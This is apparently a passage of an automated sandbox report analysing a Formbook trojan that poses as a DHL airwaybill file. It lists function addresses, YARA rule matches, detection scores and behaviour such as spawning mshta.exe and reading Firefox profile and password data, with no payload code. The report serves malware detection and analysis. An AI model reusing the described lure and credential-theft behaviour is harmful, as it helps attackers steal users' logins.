            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_05F91F505_2_05F91F50
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_05F899E05_2_05F899E0
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_05F901305_2_05F90130
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_05F9012D5_2_05F9012D
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_05F900E95_2_05F900E9
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_05F8E8B05_2_05F8E8B0
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_05F87A605_2_05F87A60
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F202C06_2_02F202C0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F402746_2_02F40274
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F603E66_2_02F603E6
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EAE3F06_2_02EAE3F0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F5A3526_2_02F5A352
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02E6A33D6_2_02E6A33D
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F320006_2_02F32000
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F581CC6_2_02F581CC
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F541A26_2_02F541A2
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F601AA6_2_02F601AA
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F281586_2_02F28158
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02E6A1356_2_02E6A135
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02E901006_2_02E90100
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F3A1186_2_02F3A118
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EBC6E06_2_02EBC6E0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02E9C7C06_2_02E9C7C0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EA07706_2_02EA0770
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EC47506_2_02EC4750
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F4E4F66_2_02F4E4F6
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F524466_2_02F52446
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F444206_2_02F44420
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F605916_2_02F60591
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02E6A5456_2_02E6A545
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EA05356_2_02EA0535
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02E9EA806_2_02E9EA80
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F56BD76_2_02F56BD7
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F5AB406_2_02F5AB40
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ECE8F06_2_02ECE8F0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02E868B86_2_02E868B8
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EA28406_2_02EA2840
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EAA8406_2_02EAA840
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EA29A06_2_02EA29A0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F6A9A66_2_02F6A9A6
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EB69626_2_02EB6962
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F5EEDB6_2_02F5EEDB
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F5CE936_2_02F5CE93
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EB2E906_2_02EB2E90
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EA0E596_2_02EA0E59
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F5EE266_2_02F5EE26
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EACFE06_2_02EACFE0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02E92FC86_2_02E92FC8
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F1EFA06_2_02F1EFA0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F14F406_2_02F14F40
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F42F306_2_02F42F30
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EE2F286_2_02EE2F28
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EC0F306_2_02EC0F30
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02E90CF26_2_02E90CF2
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F40CB56_2_02F40CB5
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EA0C006_2_02EA0C00
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02E9ADE06_2_02E9ADE0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EB8DBF6_2_02EB8DBF
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EAAD006_2_02EAAD00
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F3CD1F6_2_02F3CD1F
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F412ED6_2_02F412ED
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EBB2C06_2_02EBB2C0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EA52A06_2_02EA52A0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EE739A6_2_02EE739A
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02E8D34C6_2_02E8D34C
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F5132D6_2_02F5132D
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F5F0E06_2_02F5F0E0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F570E96_2_02F570E9
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EA70C06_2_02EA70C0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F4F0CC6_2_02F4F0CC
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EAB1B06_2_02EAB1B0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED516C6_2_02ED516C
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02E8F1726_2_02E8F172
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F6B16B6_2_02F6B16B
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F516CC6_2_02F516CC
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EE56306_2_02EE5630
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F5F7B06_2_02F5F7B0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02E914606_2_02E91460
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F5F43F6_2_02F5F43F
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F695C36_2_02F695C3
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F3D5B06_2_02F3D5B0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F575716_2_02F57571
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F4DAC66_2_02F4DAC6
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EE5AA06_2_02EE5AA0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F41AA36_2_02F41AA3
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F3DAAC6_2_02F3DAAC
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F13A6C6_2_02F13A6C
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F57A466_2_02F57A46
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F5FA496_2_02F5FA49
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F15BF06_2_02F15BF0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EDDBF96_2_02EDDBF9
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EBFB806_2_02EBFB80
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F5FB766_2_02F5FB76
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EA38E06_2_02EA38E0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F0D8006_2_02F0D800
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EA99506_2_02EA9950
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EBB9506_2_02EBB950
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F359106_2_02F35910
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EA9EB06_2_02EA9EB0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02E63FD56_2_02E63FD5
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02E63FD26_2_02E63FD2
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F5FFB16_2_02F5FFB1
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EA1F926_2_02EA1F92
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F5FF096_2_02F5FF09
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F5FCF26_2_02F5FCF2
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F19C326_2_02F19C32
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EBFDC06_2_02EBFDC0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F57D736_2_02F57D73
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02EA3D406_2_02EA3D40
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02F51D5A6_2_02F51D5A
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_005319106_2_00531910
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_0052C81F6_2_0052C81F
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_0052C8206_2_0052C820
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_0052CA406_2_0052CA40
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_0052AAC06_2_0052AAC0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_00534FB06_2_00534FB0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_005331496_2_00533149
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_005331906_2_00533190
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_0053318D6_2_0053318D
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_0054B5206_2_0054B520
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_031B019D6_2_031B019D
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_031BD8E86_2_031BD8E8
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: String function: 01AFB970 appears 280 times
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: String function: 01B8F290 appears 105 times
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: String function: 01B7EA12 appears 86 times
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: String function: 01B45130 appears 58 times
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: String function: 01B57E54 appears 111 times
            Source: C:\Windows\SysWOW64\mshta.exeCode function: String function: 02F1F290 appears 105 times
            Source: C:\Windows\SysWOW64\mshta.exeCode function: String function: 02ED5130 appears 58 times
            Source: C:\Windows\SysWOW64\mshta.exeCode function: String function: 02F0EA12 appears 86 times
            Source: C:\Windows\SysWOW64\mshta.exeCode function: String function: 02E8B970 appears 280 times
            Source: C:\Windows\SysWOW64\mshta.exeCode function: String function: 02EE7E54 appears 111 times
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000000.00000002.2158301381.0000000008550000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs DHL airwaybill # 6913321715 & BL Draft copy.exe
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000000.00000002.2155275562.00000000037E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs DHL airwaybill # 6913321715 & BL Draft copy.exe
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000000.00000002.2153050073.000000000095E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs DHL airwaybill # 6913321715 & BL Draft copy.exe
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000000.00000002.2154287854.00000000027E1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs DHL airwaybill # 6913321715 & BL Draft copy.exe
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000000.00000000.2132774257.0000000000380000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameZYkF.exe* vs DHL airwaybill # 6913321715 & BL Draft copy.exe
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000000.00000002.2157386914.00000000069F0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs DHL airwaybill # 6913321715 & BL Draft copy.exe
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000000.00000002.2154287854.0000000002830000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs DHL airwaybill # 6913321715 & BL Draft copy.exe
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000003.00000002.2381317520.0000000001518000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMSHTA.EXED vs DHL airwaybill # 6913321715 & BL Draft copy.exe
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000003.00000002.2381826994.0000000001BFD000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs DHL airwaybill # 6913321715 & BL Draft copy.exe
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000003.00000002.2381317520.0000000001508000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMSHTA.EXED vs DHL airwaybill # 6913321715 & BL Draft copy.exe
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe Binary or memory string: OriginalFilenameZYkF.exe* vs DHL airwaybill # 6913321715 & BL Draft copy.exe
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 3.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 3.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4605505683.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4606130866.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4609561064.0000000005F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2381729244.0000000001A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2382589279.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.8550000.6.raw.unpack, emu8FuFpCfwR9JjoYE.cs Security API names: _0020.SetAccessControl
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.8550000.6.raw.unpack, emu8FuFpCfwR9JjoYE.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.8550000.6.raw.unpack, emu8FuFpCfwR9JjoYE.cs Security API names: _0020.AddAccessRule
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3abe148.4.raw.unpack, s8uyooQ3ZFuJisHEdm.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.8550000.6.raw.unpack, s8uyooQ3ZFuJisHEdm.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3abe148.4.raw.unpack, emu8FuFpCfwR9JjoYE.cs Security API names: _0020.SetAccessControl
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3abe148.4.raw.unpack, emu8FuFpCfwR9JjoYE.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3abe148.4.raw.unpack, emu8FuFpCfwR9JjoYE.cs Security API names: _0020.AddAccessRule
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3a36728.3.raw.unpack, s8uyooQ3ZFuJisHEdm.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3a36728.3.raw.unpack, emu8FuFpCfwR9JjoYE.cs Security API names: _0020.SetAccessControl
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3a36728.3.raw.unpack, emu8FuFpCfwR9JjoYE.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3a36728.3.raw.unpack, emu8FuFpCfwR9JjoYE.cs Security API names: _0020.AddAccessRule
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@15/12
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL airwaybill # 6913321715 & BL Draft copy.exe.log
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Mutant created: NULL
            Source: C:\Windows\SysWOW64\mshta.exe File created: C:\Users\user\AppData\Local\Temp\14_8-J-J8
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: mshta.exe, 00000006.00000002.4603364432.00000000026D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.4603364432.00000000026A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2555939338.00000000026A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2558528874.00000000026B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2555756474.0000000002688000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe ReversingLabs: Detection: 60%
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe Virustotal: Detection: 53%
            Source: unknown Process created: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe "C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe"
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Process created: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe "C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe"
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe"
            Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: msasn1.dllJump to behavior
